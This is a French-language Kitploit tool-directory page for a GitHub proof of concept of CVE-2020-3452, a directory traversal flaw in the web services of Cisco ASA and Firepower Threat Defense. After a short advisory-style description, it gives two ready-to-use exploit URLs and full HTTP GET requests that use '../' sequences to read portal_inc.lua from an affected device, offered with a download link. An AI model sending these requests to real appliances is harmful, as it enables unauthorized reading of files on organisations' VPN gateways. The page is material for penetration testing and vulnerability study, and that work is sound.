Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-3452 — [CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) et Cisco Firepower Threat Defense (FTD) : Traversée de répertoire en lecture seule du service Web | Kitploit
Outils/GitHubGitHub/murataydemir/cve-2020-3452
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubmurataydemir/cve-2020-3452

CVE-2020-3452

[CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) et Cisco Firepower Threat Defense (FTD) : Traversée de répertoire en lecture seule du service Web

Voir le dépôt
7650il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

[CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) et Cisco Firepower Threat Defense (FTD) — Traversée de répertoire en lecture seule du service Web


Une vulnérabilité dans l'interface des services Web des logiciels Cisco Adaptive Security Appliance (ASA) et Cisco Firepower Threat Defense (FTD) pourrait permettre à un attaquant distant non authentifié de mener des attaques de traversée de répertoire et de lire des fichiers sensibles sur un système ciblé.

La vulnérabilité est due à un manque de validation appropriée des entrées des URL dans les requêtes HTTP traitées par un appareil concerné. Un attaquant pourrait exploiter cette vulnérabilité en envoyant une requête HTTP spécialement conçue contenant des séquences de caractères de traversée de répertoire à un appareil concerné. Une exploitation réussie pourrait permettre à l'attaquant de visualiser des fichiers arbitraires dans le système de fichiers des services Web sur l'appareil ciblé. Le système de fichiers des services Web est activé lorsque l'appareil concerné est configuré avec les fonctionnalités WebVPN ou AnyConnect. Cette vulnérabilité ne peut pas être utilisée pour obtenir un accès aux fichiers système ASA ou FTD ou aux fichiers du système d'exploitation (OS) sous-jacent.

root@kitploit:~
https://{host}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
root@kitploit:~
https://{host}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua

GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

Image du PoC

Télécharger l’outil